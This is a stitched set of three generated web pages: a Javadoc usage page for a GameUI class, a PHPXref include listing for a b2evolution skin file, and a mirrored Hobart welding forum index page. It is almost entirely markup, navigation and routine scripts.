<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing constructors, and an explanation">
<caption><span>Constructors in <a href="../../controller/package-summary.html">controller</a> with parameters of type <a href="../../view/GameUI.html" title="class in view">GameUI</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colLast"><code><strong><a href="../../controller/GameController.html#GameController(view.GameUI)">GameController</a></strong>(<a href="../../view/GameUI.html" title="class in view">GameUI</a> gameUI)</code> </td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../view/GameUI.html" title="class in view">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../../overview-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?view/class-use/GameUI.html" target="_top">Frames</a></li>
<li><a href="GameUI.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
inc/skins/model/_skin.class.php.xref.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Require cross reference for _skin.class.php</title>
<link rel="stylesheet" href="../../../sample.css" type="text/css">
<link rel="stylesheet" href="../../../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../../../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../../../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../../../';
subdir='inc/skins/model';
filename='_skin.class.php.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../../../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
<br>Directory: <a href="./index.html">/inc/skins/model/</a><br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../../../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../../../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../../../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../../../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../../../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h1><a href="_skin.class.php.html">_skin.class.php</a></h1>
Included or required 1 times by other pages:<BR>
<ul>
<li><a href="../../../inc/skins/model/_skincache.class.php.html">inc/skins/model/_skincache.class.php</a> -> <a href="../../../inc/skins/model/_skincache.class.php.source.html#l156">line 156</a></li>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
boerweld/weldtalk/forumdisplay4309.html | budiperkasa/tukangbagus | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- BEGIN TEMPLATE: FORUMDISPLAY -->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_html">
<!-- Mirrored from www.hobartwelders.com/weldtalk/forumdisplay.php?13-General-Welding-Questions by HTTrack Website Copier/3.x [XR&CO'2010], Tue, 27 Aug 2013 05:06:35 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><!-- /Added by HTTrack -->
<head>
<!-- BEGIN TEMPLATE: headinclude -->
<meta name="keywords" content="welding, MIG welders, STICK welders, TIG welders, wire feed welders, engine driven welders, plasma cutters, spot welders, welding projects, welding applications, welding equipment, production, farming, auto repair, maintenance, do-it-yourself, artistic, Hobart, Hobart Welders, WeldTalk Forum, Weld Talk, abrasives, welding helmets, stick electrodes, welding wire, welding accessories" />
<meta name="description" content="Register and take part in discussions on welding equipment, welding applications and welding projects with Hobart's Weld Talk online forum." />
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta id="e_vb_meta_bburl" name="vb_meta_bburl" content="../weldtalk.html" />
<base /><!--[if IE]></base><![endif]-->
<meta name="generator" content="vBulletin 4.2.0" />
<link rel="Shortcut Icon" href="favicon.html" type="image/x-icon" />
<meta name="keywords" content="General Welding Questions, welding, welders, tig, mig, training, weld shop, welding projects, vbulletin,forum,bbs,discussion,bulletin board" />
<meta name="description" content="A place for general welding-related discussions that dont fit neatly in the categories below." />
<script type="text/javascript">
<!--
if (typeof YAHOO === 'undefined') // Load ALL YUI Local
{
document.write('<script type="text/javascript" src="clientscript/yui/yuiloader-dom-event/yuiloader-dom-event9213.html?v=420"><\/script>');
document.write('<script type="text/javascript" src="clientscript/yui/connection/connection-min9213.html?v=420"><\/script>');
var yuipath = 'clientscript/yui';
var yuicombopath = '';
var remoteyui = false;
}
else // Load Rest of YUI remotely (where possible)
{
var yuipath = 'clientscript/yui';
var yuicombopath = '';
var remoteyui = true;
if (!yuicombopath)
{
document.write('<script type="text/javascript" src="clientscript/yui/connection/connection-min.html"><\/script>');
}
}
var SESSIONURL = "";
var SECURITYTOKEN = "guest";
var IMGDIR_MISC = "images/misc";
var IMGDIR_BUTTON = "images/buttons";
var vb_disable_ajax = parseInt("0", 10);
var SIMPLEVERSION = "420";
var BBURL = "../weldtalk.html";
var LOGGEDIN = 0 > 0 ? true : false;
var THIS_SCRIPT = "forumdisplay";
var RELPATH = "forumdisplay4309.html?13-General-Welding-Questions";
var PATHS = {
forum : "",
cms : "",
blog : ""
};
var AJAXBASEURL = "index.html";
// -->
</script>
<script type="text/javascript" src="clientscript/vbulletin-core9213.html?v=420"></script>
<link rel="stylesheet" type="text/css" href="css482e.html?styleid=5&langid=1&d=1377008621&td=ltr&sheet=bbcode.css,editor.css,popupmenu.css,reset-fonts.css,vbulletin.css,vbulletin-chrome.css,vbulletin-formcontrols.css," />
<!--[if lt IE 8]>
<link rel="stylesheet" type="text/css" href="css.php?styleid=5&langid=1&d=1377008621&td=ltr&sheet=popupmenu-ie.css,vbulletin-ie.css,vbulletin-chrome-ie.css,vbulletin-formcontrols-ie.css,editor-ie.css" />
<![endif]-->
<link rel="stylesheet" href="../includes/master.css" type="text/css" charset="utf-8" />
<!--[if lt IE 7]><link rel="stylesheet" type="text/css" href="/includes/ie6/master.css" /><![endif]-->
<link rel="stylesheet" href="../includes/printable.css" type="text/css" media="print" charset="utf-8" />
<link rel="stylesheet" href="../includes/weldtalk/weldtalkc81e.html?2" type="text/css" charset="utf-8" />
<!--[if IE]><link rel="stylesheet" type="text/css" href="/includes/weldtalk/ie.css" /><![endif]-->
<link rel="stylesheet" type="text/css" href="../includes/weldtalk/weldtalk-printable.html" media="print" />
<script type="text/javascript" charset="utf-8" src="../includes/mootools.js"></script>
<script type="text/javascript" charset="utf-8" src="../includes/master.js"></script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-321856-1");
pageTracker._trackPageview();
} catch(err) {}</script>
<title>Weld Talk Message Board and Online Forum - Hobart Welders</title>
<!-- END TEMPLATE: headinclude -->
<title>General Welding Questions</title>
<script type="text/javascript" src="clientscript/vbulletin_read_marker9213.html?v=420"></script>
<link rel="stylesheet" type="text/css" href="cssd636.html?styleid=5&langid=1&d=1377008621&td=ltr&sheet=toolsmenu.css,forumbits.css,forumdisplay.css,threadlist.css,options.css" />
<!--[if lt IE 8]>
<script type="text/javascript" src="clientscript/vbulletin-threadlist-ie.js?v=420"></script>
<link rel="stylesheet" type="text/css" href="css.php?styleid=5&langid=1&d=1377008621&td=ltr&sheet=toolsmenu-ie.css,forumbits-ie.css,forumdisplay-ie.css,threadlist-ie.css,options-ie.css" />
<![endif]-->
<!-- BEGIN TEMPLATE: headinclude_bottom -->
<link rel="stylesheet" type="text/css" href="css15ee.html?styleid=5&langid=1&d=1377008621&td=ltr&sheet=additional.css" />
<!-- END TEMPLATE: headinclude_bottom -->
</head>
<body>
<!-- BEGIN TEMPLATE: header -->
<div id="wrap">
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<div id="header">
<h1><a href="../index.html"><span>Hobart Welders</span></a></h1>
<div id="mainnav">
<a id="navProducts" href="../products/index.html" rel="dropnavProducts"><span>Products</span></a> <br />
<a id="navWTB" href="../wheretobuy/index.html" rel="dropnavWhereToBuy"><span>Where to Buy</span></a> <br />
<a id="navService" href="../service/index.html" rel="dropnavService"><span>Service & Support</span></a> <br />
<a id="navELearning" href="../elearning/index.html"><span>e-Learning</span></a> <br />
<a id="navWeldTalk" href="index.html"><span>Weld Talk</span></a>
<div id="dropnavProducts" class="dropnav">
<div class="dropnavarrow"></div>
<div class="dropnavcontent">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<h3 class="nom">Welding Equipment:</h3>
<a id="dnWireFeed" href="../products/wirefeed/index.html">Wire Feed Welders</a>
<a id="dnSpoolGuns" href="../products/wirefeed/spoolguns/index.html">Spool Guns</a>
<a id="dnGenerators" href="../products/generators/index.html">Welder/Generator</a>
<a id="dnTIG" href="../products/tig/index.html">TIG Welders</a>
<a id="dnStick" href="../products/stick/index.html">Stick Welders</a>
<a id="dnBattery" href="../products/battery-powered/index.html">Battery-Powered</a>
</td>
<td>
<h3 class="nom">Cutting Products:</h3>
<a id="dnPlasma" href="../products/plasma/index.html">Plasma Cutters</a>
<a id="dnOxyfuel" href="../products/oxyfuel/index.html">Oxy-Acetylene / Propane</a>
<a id="dnHelmets" href="../products/welding-helmets/index.html">Welding Helmets</a>
<a id="dnElecWire" href="../products/electrodes-wire/index.html">Stick Electrodes & Welding Wire</a>
</td>
<td class="tdlast">
<a id="dnAccessories" href="../products/accessories/index.html">Accessories:</a>
<a href="../products/accessories/wire-welding/index.html">Wire Welding Accessories</a>
<a href="../products/accessories/stick/index.html">Stick Welding Accessories</a>
<a href="../products/accessories/plasma/index.html">Plasma Cutting Accessories</a>
<a href="../products/accessories/tools/index.html">Tools</a>
<a href="../products/accessories/cables-connectors/index.html">Cables & Connectors</a>
<a href="../products/accessories/oxyfuel/index.html">Oxy-Fuel Accessories</a>
<a href="../products/accessories/welding-gear/index.html">Safety Gear</a>
<a href="../products/accessories/value-packs/index.html">Value Packs</a>
<a href="../products/accessories/abrasives/index.html">Abrasives</a>
<a href="../products/accessories/propane/index.html">Oxy/Fuel Tips</a>
<a href="../products/accessories/generators/index.html">Welder/Generator Accessories</a>
</td>
</tr>
</table>
</div>
</div>
<div id="dropnavWhereToBuy" class="dropnav" style="">
<div class="dropnavarrow"></div>
<div class="dropnavcontent">
<table border="0" cellspacing="0" cellpadding="0" width="100%">
<tr>
<td onmouseout="this.className='';" onmouseover="this.className='graytd';" id="" width="20%">
<a id="" style="padding: 5px; font-size:12px;" href="../wheretobuy/index94e2.html?type=accessories">
<img src="../wheretobuy/images/navAccessories.png" alt="Where To Buy Welding Accessories" align="middle" class="imgpadding">
<div style="font-weight: bold;padding-top:3px;padding-bottom:3px;" >Accessories & Equipment</div>
<font style="color: #000; cursor: pointer;">Find a wide variety of Hobart products at these retail locations.
</font>
</a>
</td>
<td onmouseout="this.className='';" onmouseover="this.className='graytd';" id="" width="20%">
<a id="" style="padding: 5px; font-size:12px;" href="../wheretobuy/index4890.html?type=weldingdestination">
<img src="../wheretobuy/images/navWelding.png" alt="Hobart Welding Destination" align="middle" class="imgpadding">
<div style="font-weight: bold ;padding-top:3px;padding-bottom:3px;">Welding Destination</div>
<font style="color: #000; cursor: pointer;">Dedicated Hobart partners that carry our full line of welding equipment & accessories.</font>
</a>
</td>
<td onmouseout="this.className='';" onmouseover="this.className='graytd';" id="" width="20%">
<a id="" style="padding: 5px; font-size:12px;" href="../wheretobuy/index3dad.html?type=equipment">
<img src="../wheretobuy/images/navEquipment.png" alt="Where To Buy Hobart Equipment" align="middle" class="imgpadding">
<div style="font-weight: bold;padding-top:3px;padding-bottom:3px;">Equipment Only</div>
<font style="color: #000; cursor: pointer;">Knowledgeble welding distributors who can help you select the right Hobart equipment.</font>
</a>
</td>
<td onmouseout="this.className='';" onmouseover="this.className='graytd';" id="" width="20%">
<a id="" style="padding: 5px; font-size:12px;" href="../wheretobuy/indexd7d3.html?type=online">
<img src="../wheretobuy/images/navOnline.png" alt="Hobart Online Retailers" align="middle" class="imgpadding">
<div style="font-weight: bold;padding-top:3px;padding-bottom:3px;">Online Retailer</div>
<font style="color: #000; cursor: pointer;">Hobart products delivered right to your door!</font>
</a>
</td>
<td onmouseout="this.className='tdlast';" onmouseover="this.className='tdlast graytd';" id="" width="20%">
<a id="" style="padding: 5px; font-size:12px;" href="../wheretobuy/index1b02.html?type=service">
<img src="../wheretobuy/images/navService.png" alt="Hobart Service Providers" align="middle" class="imgpadding">
<div style="font-weight: bold;padding-top:3px;padding-bottom:3px;">Service</div>
<font style="color: #000; cursor: pointer;">Hobart's service network providing warranty service & genuine replacement parts.</font>
</a>
</td>
</tr>
</table>
</div>
</div>
<div id="dropnavService" class="dropnav">
<div class="dropnavarrow"></div>
<div class="dropnavcontent">
<a href="../wheretobuy/index1b02.html?type=service">Service Locator</a>
<a href="../service/registration/index.html">Product Registration</a>
<a href="../service/owners-manuals/index.html">Owner's Manuals</a>
<a href="../service/orderlit.html">Product Literature</a>
<a href="../service/warranty/index.html">Warranty</a>
<a href="../service/msds/index.html">MSDS</a>
<a href="../service/welding-links/index.html">Welding Links</a>
</div>
</div>
</div>
<div id="sitesearch">
<form action="http://www.hobartwelders.com/search/" method="get" accept-charset="utf-8">
<span>Site Search</span>
<input type="text" name="q" value="" id="sitesearchquery" />
<input type="image" src="../images/go.png" value="Go" id="reggo" />
<input type="image" src="../images/slim-go.png" value="Go" id="slimgo" />
</form>
</div>
</div>
<div id="printableHeader">
<img src="../images/hobart.png" alt="Hobart Welders" width="169" height="41" />
</div>
<div id="subheader">
<div id="subheaderrt">
</div>
<div id="crumbs">
<a href="../index.html">Home</a> »
Weld Talk
</div>
</div>
<div id="weldtalkheader">
<div class="above_body"> <!-- closing tag is in template navbar -->
<div id="header2" class="floatcontainer doc_header">
<div><a name="top" href="forum.html" class="logo-image"><img src="images/misc/vbulletin4_logo.html" alt="Weld Talk Message Boards - Powered by vBulletin" /></a></div>
<div id="toplinks" class="toplinks">
<ul class="nouser">
<li><a href="register.html" rel="nofollow">Register</a></li>
<li><a rel="help" href="faq.html">Help</a></li>
<li>
<script type="text/javascript" src="clientscript/vbulletin_md59213.html?v=420"></script>
<form id="navbar_loginform" action="http://www.hobartwelders.com/weldtalk/login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<fieldset id="logindetails" class="logindetails">
<div>
<div>
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
<input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
<input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile for yourself." accesskey="s" />
</div>
</div>
</fieldset>
<div id="remember" class="remember">
<label for="cb_cookieuser_navbar"><input type="checkbox" name="cookieuser" value="1" id="cb_cookieuser_navbar" class="cb_cookieuser_navbar" accesskey="c" tabindex="103" /> Remember Me?</label>
</div>
<input type="hidden" name="s" value="" />
<input type="hidden" name="securitytoken" value="guest" />
<input type="hidden" name="do" value="login" />
<input type="hidden" name="vb_login_md5password" />
<input type="hidden" name="vb_login_md5password_utf" />
</form>
<script type="text/javascript">
YAHOO.util.Dom.setStyle('navbar_password_hint', "display", "inline");
YAHOO.util.Dom.setStyle('navbar_password', "display", "none");
vB_XHTML_Ready.subscribe(function()
{
//
YAHOO.util.Event.on('navbar_username', "focus", navbar_username_focus);
YAHOO.util.Event.on('navbar_username', "blur", navbar_username_blur);
YAHOO.util.Event.on('navbar_password_hint', "focus", navbar_password_hint);
YAHOO.util.Event.on('navbar_password', "blur", navbar_password);
});
function navbar_username_focus(e)
{
//
var textbox = YAHOO.util.Event.getTarget(e);
if (textbox.value == 'User Name')
{
//
textbox.value='';
textbox.style.color='#000000';
}
}
function navbar_username_blur(e)
{
//
var textbox = YAHOO.util.Event.getTarget(e);
if (textbox.value == '')
{
//
textbox.value='User Name';
textbox.style.color='#777777';
}
}
function navbar_password_hint(e)
{
//
var textbox = YAHOO.util.Event.getTarget(e);
YAHOO.util.Dom.setStyle('navbar_password_hint', "display", "none");
YAHOO.util.Dom.setStyle('navbar_password', "display", "inline");
YAHOO.util.Dom.get('navbar_password').focus();
}
function navbar_password(e)
{
//
var textbox = YAHOO.util.Event.getTarget(e);
if (textbox.value == '')
{
YAHOO.util.Dom.setStyle('navbar_password_hint', "display", "inline");
YAHOO.util.Dom.setStyle('navbar_password', "display", "none");
}
}
</script>
</li>
</ul>
</div>
<div class="ad_global_header">
<!-- BEGIN TEMPLATE: ad_global_header1 -->
<!-- END TEMPLATE: ad_global_header1 -->
<!-- BEGIN TEMPLATE: ad_global_header2 -->
<!-- END TEMPLATE: ad_global_header2 -->
</div>
<hr />
</div>
</div> <!-- weldtalkheader -->
<!-- END TEMPLATE: header -->
<!-- BEGIN TEMPLATE: navbar -->
<div id="navbar" class="navbar">
<ul id="navtabs" class="navtabs floatcontainer">
<!-- BEGIN TEMPLATE: navbar_tabs -->
<li id="vbtab_whatsnew">
<a class="navtab" href="activity.html">What's New?</a>
</li>
<li class="selected" id="vbtab_forum">
<a class="navtab" href="forum.html">Forum</a>
<ul class="floatcontainer">
<li id="vbflink_newposts"><a href="search8427.html?do=getnew&contenttype=vBForum_Post">New Posts</a></li>
<li id="vbflink_faq"><a href="faq.html">FAQ</a></li>
<li id="vbflink_calendar"><a href="calendar.html">Calendar</a></li>
<li class="popupmenu" id="vbmenu_community">
<a href="javascript://" class="popupctrl">Community</a>
<ul class="popupbody popuphover">
<li id="vbclink_groups"><a href="group.html">Groups</a></li>
<li id="vbclink_albums"><a href="album.html">Albums</a></li>
<li id="vbclink_members"><a href="memberlist.html">Member List</a></li>
</ul>
</li>
<li class="popupmenu" id="vbmenu_actions">
<a href="javascript://" class="popupctrl">Forum Actions</a>
<ul class="popupbody popuphover">
<li id="vbalink_mfr"><a href="forumdisplay954b.html?do=markread&markreadhash=guest">Mark Forums Read</a></li>
</ul>
</li>
<li class="popupmenu" id="vbmenu_qlinks">
<a href="javascript://" class="popupctrl">Quick Links</a>
<ul class="popupbody popuphover">
<li id="vbqlink_posts"><a href="search2791.html?do=getdaily&contenttype=vBForum_Post">Today's Posts</a></li>
</ul>
</li>
</ul>
</li>
<!-- END TEMPLATE: navbar_tabs -->
</ul>
<div id="globalsearch" class="globalsearch">
<form action="http://www.hobartwelders.com/weldtalk/search.php?do=process" method="post" id="navbar_search" class="navbar_search">
<input type="hidden" name="securitytoken" value="guest" />
<input type="hidden" name="do" value="process" />
<span class="textboxcontainer"><span><input type="text" value="" name="query" class="textbox" tabindex="99"/></span></span>
<span class="buttoncontainer"><span><input type="image" class="searchbutton" src="images/buttons/search.png" name="submit" onclick="document.getElementById('navbar_search').submit;" tabindex="100"/></span></span>
</form>
<ul class="navbar_advanced_search">
<li><a href="search.html" accesskey="4">Advanced Search</a></li>
</ul>
</div>
</div>
</div><!-- closing div for above_body -->
<div class="body_wrapper">
<div id="breadcrumb" class="breadcrumb">
<ul class="floatcontainer">
<li class="navbithome"><a href="forum.html" accesskey="1"><img src="images/misc/navbit-home.html" alt="Home" /></a></li>
<!-- BEGIN TEMPLATE: navbar_link -->
<li class="navbit"><a href="forum.html">Forum</a></li>
<!-- END TEMPLATE: navbar_link --><!-- BEGIN TEMPLATE: navbar_link -->
<li class="navbit"><a href="forumdisplay03b4.html?12-EQUIPMENT-TALK">EQUIPMENT TALK</a></li>
<!-- END TEMPLATE: navbar_link -->
<!-- BEGIN TEMPLATE: navbar_link -->
<li class="navbit lastnavbit"><span>General Welding Questions</span></li>
<!-- END TEMPLATE: navbar_link -->
</ul>
<hr />
</div>
<!-- BEGIN TEMPLATE: ad_navbar_below -->
<!-- END TEMPLATE: ad_navbar_below -->
<!-- BEGIN TEMPLATE: ad_global_below_navbar -->
<!-- END TEMPLATE: ad_global_below_navbar -->
<form action="http://www.hobartwelders.com/weldtalk/profile.php?do=dismissnotice" method="post" id="notices" class="notices">
<input type="hidden" name="do" value="dismissnotice" />
<input type="hidden" name="s" value="" />
<input type="hidden" name="securitytoken" value="guest" />
<input type="hidden" id="dismiss_notice_hidden" name="dismiss_noticeid" value="" />
<input type="hidden" name="url" value="" />
<ol>
<!-- BEGIN TEMPLATE: navbar_noticebit -->
<li class="restore" id="navbar_notice_1">
If this is your first visit, be sure to
check out the <a href="faq.html" target="_blank"><b>FAQ</b></a> by clicking the
link above. You may have to <a href="register.html" target="_blank"><b>register</b></a>
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.
</li>
<!-- END TEMPLATE: navbar_noticebit -->
</ol>
</form>
<!-- END TEMPLATE: navbar -->
<div id="above_threadlist" class="above_threadlist">
<div class="threadpagenav">
<!-- BEGIN TEMPLATE: pagenav -->
<form action="http://www.hobartwelders.com/weldtalk/forumdisplay.php?13-General-Welding-Questions/page51" method="get" class="pagination popupmenu nohovermenu">
<input type="hidden" name="f" value="13" />
<span><a href="javascript://" class="popupctrl">Page 1 of 89</a></span>
<!-- BEGIN TEMPLATE: pagenav_curpage -->
<span class="selected"><a href="javascript://" title="Results 1 to 25 of 2,213">1</a></span>
<!-- END TEMPLATE: pagenav_curpage --><!-- BEGIN TEMPLATE: pagenav_pagelink -->
<span><a href="forumdisplayf3f2.html?13-General-Welding-Questions/page2" title="Show results 26 to 50 of 2,213">2</a></span>
<!-- END TEMPLATE: pagenav_pagelink --><!-- BEGIN TEMPLATE: pagenav_pagelink -->
<span><a href="forumdisplay6409.html?13-General-Welding-Questions/page3" title="Show results 51 to 75 of 2,213">3</a></span>
<!-- END TEMPLATE: pagenav_pagelink --><!-- BEGIN TEMPLATE: pagenav_pagelinkrel -->
<span><a href="forumdisplay8da0.html?13-General-Welding-Questions/page11" title="Show results 251 to 275 of 2,213"><!--+10-->11</a></span>
<!-- END TEMPLATE: pagenav_pagelinkrel --><!-- BEGIN TEMPLATE: pagenav_pagelinkrel -->
<span><a href="forumdisplay9b76.html?13-General-Welding-Questions/page51" title="Show results 1,251 to 1,275 of 2,213"><!--+50-->51</a></span>
<!-- END TEMPLATE: pagenav_pagelinkrel -->
<span class="separator">...</span>
<span class="prev_next"><a rel="next" href="forumdisplayf3f2.html?13-General-Welding-Questions/page2" title="Next Page - Results 26 to 50 of 2,213"><img src="images/pagination/next-right.png" alt="Next" /></a></span>
<span class="first_last"><a href="forumdisplaydfb2.html?13-General-Welding-Questions/page89" title="Last Page - Results 2,201 to 2,213 of 2,213">Last<img src="images/pagination/last-right.html" alt="Last" /></a></span>
<ul class="popupbody popuphover">
<li class="formsubmit jumptopage"><label>Jump to page: <input type="text" name="page" size="4" /></label> <input type="submit" class="button" value="Go" /></li>
</ul>
</form>
<!-- END TEMPLATE: pagenav -->
<div id="threadpagestats" class="threadpagestats">Threads 1 to 25 of 2213</div>
</div>
</div>
<div id="pagetitle" class="pagetitle">
<h1>Forum: <span class="forumtitle">General Welding Questions</span></h1>
<p class="description">A place for general welding-related discussions that dont fit neatly in the categories below.</p>
</div>
<div id="above_threadlist_controls" class="above_threadlist_controls toolsmenu">
<div>
<ul class="popupgroup forumdisplaypopups" id="forumdisplaypopups">
<li class="popupmenu nohovermenu" id="forumtools">
<h6><a href="javascript://" class="popupctrl" rel="nofollow">Forum Tools</a></h6>
<ul class="popupbody popuphover">
<li>
<a href="forumdisplay03b4.html?do=markread&f=13&markreadhash=guest" rel="nofollow" onclick="return mark_forum_and_threads_read(13);">
Mark This Forum Read
</a>
</li>
<li><a href="forumdisplay03b4.html?12-EQUIPMENT-TALK" rel="nofollow">View Parent Forum</a></li>
</ul>
</li>
<li class="popupmenu nohovermenu forumsearch menusearch" id="forumsearch">
<h6><a href="javascript://" class="popupctrl">Search Forum</a></h6>
<form action="http://www.hobartwelders.com/weldtalk/search.php?do=process" method="get">
<ul class="popupbody popuphover">
<li>
<input type="text" class="searchbox" name="q" value="Search..." />
<input type="submit" class="button" value="Search" />
</li>
<li class="formsubmit" id="popupsearch">
<div class="submitoptions">
<label><input type="radio" name="showposts" value="0" checked="checked" /> Show Threads</label>
<label><input type="radio" name="showposts" value="1" /> Show Posts</label>
</div>
<div class="advancedsearchlink"><a href="search8e32.html?search_type=1&contenttype=vBForum_Post&forumchoice[]=13" rel="nofollow">Advanced Search</a></div>
</li>
</ul>
<input type="hidden" name="s" value="" />
<input type="hidden" name="securitytoken" value="guest" />
<input type="hidden" name="do" value="process" />
<input type="hidden" name="contenttype" value="vBForum_Post" />
<input type="hidden" name="forumchoice[]" value="13" />
<input type="hidden" name="childforums" value="1" />
<input type="hidden" name="exactname" value="1" />
</form>
</li>
</ul>
</div>
</div>
<div id="threadlist" class="threadlist">
<form id="thread_inlinemod_form" action="http://www.hobartwelders.com/weldtalk/inlinemod.php?forumid=13" method="post">
<h2 class="hidden">Threads in This Forum</h2>
<div>
<div class="threadlisthead table">
<div>
<span class="threadinfo">
<span class="threadtitle">
<a href="forumdisplay2de0.html?13-General-Welding-Questions&sort=title&order=asc" rel="nofollow">Title</a> /
<a href="forumdisplay6c73.html?13-General-Welding-Questions&sort=postusername&order=asc" rel="nofollow">Thread Starter</a>
</span>
</span>
<span class="threadstats td"><a href="forumdisplay0c30.html?13-General-Welding-Questions&sort=replycount&order=desc" rel="nofollow">Replies</a> / <a href="forumdisplaya784.html?13-General-Welding-Questions&sort=views&order=desc" rel="nofollow">Views</a></span>
<span class="threadlastpost td"><a href="forumdisplay0bf8.html?13-General-Welding-Questions&sort=lastpost&order=asc" rel="nofollow">Last Post By<!-- BEGIN TEMPLATE: forumdisplay_sortarrow -->
<img class="sortarrow" src="images/buttons/sortarrow-asc.html" alt="Reverse Sort Order" border="0" />
